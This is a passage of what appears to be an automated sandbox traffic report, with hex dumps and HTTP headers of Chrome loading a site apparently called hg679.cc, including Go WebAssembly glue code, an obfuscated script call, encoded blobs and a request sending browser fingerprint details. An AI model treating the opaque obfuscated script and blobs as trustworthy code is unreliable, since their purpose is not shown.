                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 69 74 65 20 6c 69 6e 65 0a 09 09 09 09 09 09 09 09 09 09 6c 65 74 20 6c 69 6e 65 20 3d 20 64 65 63 6f 64 65 72 2e 64 65 63 6f 64 65 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 6c 6f 67 4c 69 6e 65 29 29 3b 0a 09 09 09 09 09 09 09 09 09 09 6c 6f 67 4c 69 6e 65 20 3d 20 5b 5d 3b 0a 09 09 09 09 09 09 09 09 09 09 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 6c 69 6e 65 29 3b 0a 09 09 09 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 09 09 09 6c 6f 67 4c 69 6e 65 2e 70 75 73 68 28 63 29 3b 0a 09 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 69 6e 76 61 6c 69 64 20 66 69 6c 65 20 64 65 73 63 72 69
                                                                                                                                                          Data Ascii: ite linelet line = decoder.decode(new Uint8Array(logLine));logLine = [];console.log(line);} else {logLine.push(c);}}}} else {console.error('invalid file descri
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 63 6f 6e 73 74 20 69 64 20 3d 20 6d 65 6d 28 29 2e 67 65 74 55 69 6e 74 33 32 28 76 5f 61 64 64 72 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 09 09 74 68 69 73 2e 5f 67 6f 52 65 66 43 6f 75 6e 74 73 5b 69 64 5d 2d 2d 3b 0a 09 09 09 09 09 09 69 66 20 28 74 68 69 73 2e 5f 67 6f 52 65 66 43 6f 75 6e 74 73 5b 69 64 5d 20 3d 3d 3d 20 30 29 20 7b 0a 09 09 09 09 09 09 09 63 6f 6e 73 74 20 76 20 3d 20 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 20 3d 20 6e 75 6c 6c 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 69 64 73 2e 64 65 6c 65 74 65 28 76 29 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 69 64 50 6f 6f 6c 2e 70 75 73 68 28 69 64 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 2c 0a
                                                                                                                                                          Data Ascii: const id = mem().getUint32(v_addr, true);this._goRefCounts[id]--;if (this._goRefCounts[id] === 0) {const v = this._values[id];this._values[id] = null;this._ids.delete(v);this._idPool.push(id);}},
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 3b 0a 09 09 09 09 09 7d 2c 0a 0a 09 09 09 09 09 2f 2f 20 76 61 6c 75 65 53 65 74 49 6e 64 65 78 28 76 20 72 65 66 2c 20 69 20 69 6e 74 2c 20 78 20 72 65 66 29 0a 09 09 09 09 09 22 73 79 73 63 61 6c 6c 2f 6a 73 2e 76 61 6c 75 65 53 65 74 49 6e 64 65 78 22 3a 20 28 76 5f 61 64 64 72 2c 20 69 2c 20 78 5f 61 64 64 72 29 20 3d 3e 20 7b 0a 09 09 09 09 09 09 52 65 66 6c 65 63 74 2e 73 65 74 28 6c 6f 61 64 56 61 6c 75 65 28 76 5f 61 64 64 72 29 2c 20 69 2c 20 6c 6f 61 64 56 61 6c 75 65 28 78 5f 61 64 64 72 29 29 3b 0a 09 09 09 09 09 7d 2c 0a 0a 09 09 09 09 09 2f 2f 20 66 75 6e 63 20 76 61 6c 75 65 43 61 6c 6c 28 76 20 72 65 66 2c 20 6d 20 73 74 72 69 6e 67 2c 20 61 72 67 73 20 5b 5d 72 65 66 29 20 28 72 65 66 2c 20 62 6f 6f 6c 29 0a 09 09 09 09 09 22 73 79 73 63
                                                                                                                                                          Data Ascii: ;},// valueSetIndex(v ref, i int, x ref)"syscall/js.valueSetIndex": (v_addr, i, x_addr) => {Reflect.set(loadValue(v_addr), i, loadValue(x_addr));},// func valueCall(v ref, m string, args []ref) (ref, bool)"sysc
                                                                                                                                                          2024-06-09 22:41:01 UTC1369INData Raw: 73 74 20 76 20 3d 20 6c 6f 61 64 56 61 6c 75 65 28 76 5f 61 64 64 72 29 3b 0a 09 09 09 09 09 09 63 6f 6e 73 74 20 61 72 67 73 20 3d 20 6c 6f 61 64 53 6c 69 63 65 4f 66 56 61 6c 75 65 73 28 61 72 67 73 5f 70 74 72 2c 20 61 72 67 73 5f 6c 65 6e 2c 20 61 72 67 73 5f 63 61 70 29 3b 0a 09 09 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 09 09 73 74 6f 72 65 56 61 6c 75 65 28 72 65 74 5f 61 64 64 72 2c 20 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 76 2c 20 61 72 67 73 29 29 3b 0a 09 09 09 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 38 28 72 65 74 5f 61 64 64 72 20 2b 20 38 2c 20 31 29 3b 0a 09 09 09 09 09 09 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 0a 09 09 09 09 09 09 09 73 74 6f 72 65 56 61 6c 75 65 28 72 65 74 5f 61 64 64 72 2c 20 65 72
                                                                                                                                                          Data Ascii: st v = loadValue(v_addr);const args = loadSliceOfValues(args_ptr, args_len, args_cap);try {storeValue(ret_addr, Reflect.construct(v, args));mem().setUint8(ret_addr + 8, 1);} catch (err) {storeValue(ret_addr, er


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          226192.168.2.54997690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC621OUTGET /fiximg/ac-20200404/fileupload/ll12/202312/202312180557505.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC538INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 27136
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[21],EU-GER-frankfurt-EDGE5-CACHE6[16,TCP_MISS,19],EU-FRA-paris-GLOBAL1-CACHE5[6],EU-FRA-paris-GLOBAL1-CACHE14[0,TCP_HIT,4],1.1 google
                                                                                                                                                          X-CCDN-Expires: 790132
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 441152cefae1f1ec56562996a3221740
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:01 UTC15846INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 71 50 46 54 30 2b 39 34 4e 63 74 6c 38 4d 42 72 4b 4d 62 35 67 33 69 36 78 44 54 79 76 47 31 53 46 6e 38 31 37 74 31 36 34 4e 6d 5a 4d 6d 4d 46 30 6f 68 37 36 32 47 64 30 42 41 70 4a 66 52 72 68 35 51 49 33 34 33 71 4e 37 74 65 4f 6e 76 42 56 5a 4e 58 6f 73 79 6f 64 75 75 70 76 6f 70 78 4e 72 66 59 6d 79 46 67 66 61 56 70 72 2f 6c 69 2f 68 34 35 56 75 43 41 74 62 6b 66 4e 52 51 4e 33 4f 4a 4a 4e 58 7a 49 4e 54 70 36 52 41 6d 39 75 2f 41 42 43 37 70 78 56 6d 31 73 79 55 79 43 49 5a 41 38 4e 68 67 70 72 63 58 32 53 6c 42 77 63 6b 46 49 6b 44 45 48 4f 6c 38 4c 44 51 31 78 66 74 47 45 69 31 58 68 34 50 66 6f 53 76 39 6b 78 4b 72 61 6d 4c 54 34 70 65 33 6f 6e 48 4a 53 6a 51 2b 6e 6e 35 72 61 69 45
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g3i6xDTyvG1SFn817t164NmZMmMF0oh762Gd0BApJfRrh5QI343qN7teOnvBVZNXosyoduupvopxNrfYmyFgfaVpr/li/h45VuCAtbkfNRQN3OJJNXzINTp6RAm9u/ABC7pxVm1syUyCIZA8NhgprcX2SlBwckFIkDEHOl8LDQ1xftGEi1Xh4PfoSv9kxKramLT4pe3onHJSjQ+nn5raiE
                                                                                                                                                          2024-06-09 22:41:01 UTC11290INData Raw: 50 33 66 30 42 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45 68 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30 59 6b 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45 68 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30 59 6b 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 51 4d 6f 4d 73 6a 68 34 71 75 55 46 54 78 6c 39 70 36 5a 31 62 55 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45 68 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30 59 6b 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69
                                                                                                                                                          Data Ascii: P3f0BNvHVcSE2ix+qTpItAmDRiTbx1XEhNosfqk6SLQJg0Yk28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiTbx1XEhNosfqk6SLQJg0Yk28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiQMoMsjh4quUFTxl9p6Z1bU28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiTbx1XEhNosfqk6SLQJg0Yk28dVxITaLH6pOki


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          227192.168.2.54997490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC552OUTGET /pc/240516-03/static/js/t4091-otherConf-js.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 524
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:02:21 GMT
                                                                                                                                                          ETag: "6645cb9d-20c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[45],EU-GER-frankfurt-EDGE5-CACHE2[39,TCP_MISS,43],EU-FRA-paris-GLOBAL1-CACHE22[28],EU-FRA-paris-GLOBAL1-CACHE21[0,TCP_HIT,24],1.1 google
                                                                                                                                                          X-CCDN-Expires: 790132
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9c51ac9f7d7f5f8a26443e7a97ddc56f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:01 UTC524INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 4c 41 56 67 46 30 41 61 41 62 77 43 30 41 7a 42 41 4a 67 43 35 4b 42 58 4e 47 41 46 77 45 74 31 4d 31 69 52 69 77 41 6c 4b 51 42 45 6a 4a 43 41 41 45 53 56 67 43 64 32 62 59 51 47 34 41 38 6d 41 42 57 49 4e 67 44 6f 41 4a 69 45 72 73 30 49 41 41 6f 79 55 45 45 44 4e 59 42 50 54 48 32 45 42 39 42 79 43 51 42 5a 46 44 73 59 41 62 45 4d 4c 49 41 33 4b 43 39 47 45 44 6f 41 51 67 41 47 41 46 38 42 66 6c 30 37 59 6d 45 64 64 69 51 6f 4d 42 38 41 5a 52 42 57 44 6a 51 41 63 7a 38 6d 46 67 34 75 49 52 6c 73 78 68 6b 30 43 52 51 59 75 4a 30 45 34 51 42 48 47 51 42 68 44 78 41 41 43 52 51 41 57 31 39 69 49 72 5a 4f 4e 45 77 79 69 71 71 4a 47 54 71 77 65
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALAVgF0AaAbwC0AzBAJgC5KBXNGAFwEt1M1iRiwAlKQBEjJCAAESVgCd2bYQG4A8mABWINgDoAJiErs0IAAoyUEEDNYBPTH2EB9ByCQBZFDsYAbEMLIA3KC9GEDoAQgAGAF8Bfl07YmEddiQoMB8AZRBWDjQAcz8mFg4uIRlsxhk0CRQYuJ0E4QBHGQBhDxAACRQAW19iIrZONEwyiqqJGTqwe


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          228192.168.2.54997823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC362OUTGET /cc.png?r=1707849192 HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC572INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[18],EU-GER-frankfurt-EDGE4-CACHE2[11,TCP_MISS,16],EU-FRA-paris-GLOBAL1-CACHE23[2],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,0],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a3a0a67d9d108c82f7153e7a86a93c95
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:01 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          229192.168.2.54997718.245.199.584434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC661OUTPOST /mt-cloud/api/sn.maintain HTTP/1.1
                                                                                                                                                          Host: ocsapi-aws.huayidm.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 324
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC324OUTData Raw: 6a 73 6f 6e 3d 25 37 42 25 32 32 69 64 25 32 32 25 33 41 25 32 32 31 37 39 37 32 38 35 38 38 35 30 37 36 34 25 32 32 25 32 43 25 32 32 6a 73 6f 6e 72 70 63 25 32 32 25 33 41 25 32 32 32 2e 30 25 32 32 25 32 43 25 32 32 6d 65 74 68 6f 64 25 32 32 25 33 41 25 32 32 73 6e 2e 6d 61 69 6e 74 61 69 6e 25 32 32 25 32 43 25 32 32 70 61 72 61 6d 73 25 32 32 25 33 41 25 37 42 25 32 32 73 6e 25 32 32 25 33 41 25 32 32 6c 6c 31 32 25 32 32 25 32 43 25 32 32 6d 6f 64 75 6c 65 49 64 25 32 32 25 33 41 25 32 32 25 32 32 25 32 43 25 32 32 74 65 72 6d 69 6e 61 6c 25 32 32 25 33 41 31 25 32 43 25 32 32 68 6f 73 74 25 32 32 25 33 41 25 32 32 68 67 36 37 39 2e 63 63 25 32 32 25 32 43 25 32 32 66 69 6e 67 65 72 4f 53 4d 6f 64 65 6c 25 32 32 25 33 41 25 32 32 43 68 72 6f 6d 65
                                                                                                                                                          Data Ascii: json=%7B%22id%22%3A%2217972858850764%22%2C%22jsonrpc%22%3A%222.0%22%2C%22method%22%3A%22sn.maintain%22%2C%22params%22%3A%7B%22sn%22%3A%22ll12%22%2C%22moduleId%22%3A%22%22%2C%22terminal%22%3A1%2C%22host%22%3A%22hg679.cc%22%2C%22fingerOSModel%22%3A%22Chrome
                                                                                                                                                          2024-06-09 22:41:02 UTC654INHTTP/1.1 200
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Origin
                                                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          api-elapsed: 0
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 73e4a08241a776de96ba6887881361c6.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: CDG55-P2
                                                                                                                                                          X-Amz-Cf-Id: yT06-LcNFFHbY41YmCOC9ukUSThGDMbVXOjab37i2xgCdnatj_jO8w==
                                                                                                                                                          2024-06-09 22:41:02 UTC196INData Raw: 62 65 0d 0a 7b 22 69 64 22 3a 22 31 37 39 37 32 38 35 38 38 35 30 37 36 34 22 2c 22 72 65 73 75 6c 74 22 3a 7b 22 65 6e 74 72 79 43 61 63 68 65 54 69 6d 65 22 3a 6e 75 6c 6c 2c 22 66 6c 61 67 22 3a 30 2c 22 6e 6f 77 22 3a 6e 75 6c 6c 2c 22 73 74 61 72 74 54 69 6d 65 22 3a 6e 75 6c 6c 2c 22 65 6e 64 54 69 6d 65 22 3a 6e 75 6c 6c 2c 22 6d 6f 64 75 6c 65 49 64 22 3a 6e 75 6c 6c 2c 22 6d 74 43 61 63 68 65 45 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 75 73 65 72 4d 65 6d 6f 22 3a 6e 75 6c 6c 7d 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 7d 0a 0d 0a
                                                                                                                                                          Data Ascii: be{"id":"17972858850764","result":{"entryCacheTime":null,"flag":0,"now":null,"startTime":null,"endTime":null,"moduleId":null,"mtCacheError":null,"userMemo":null},"error":null,"jsonrpc":"2.0"}
                                                                                                                                                          2024-06-09 22:41:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          230192.168.2.54998190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC359OUTGET /cc.png?r=4421600803 HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC571INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[17],EU-GER-frankfurt-EDGE5-CACHE1[12,TCP_MISS,16],EU-FRA-paris-GLOBAL1-CACHE14[2],EU-FRA-paris-GLOBAL1-CACHE2[0,TCP_HIT,0],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: e52d54f9ea916ec7e458dd889c156791
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:01 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          231192.168.2.549980163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC369OUTGET /ocs/cc.png?1717972856368 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC420INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache19.l2hk3[7,0], cache34.l2sg3[41,0], ens-cache10.de5[210,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55c9e17179728615297697e
                                                                                                                                                          2024-06-09 22:41:01 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          232192.168.2.54997390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC548OUTGET /pc/240516-03/static/js/t4091-index-js.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
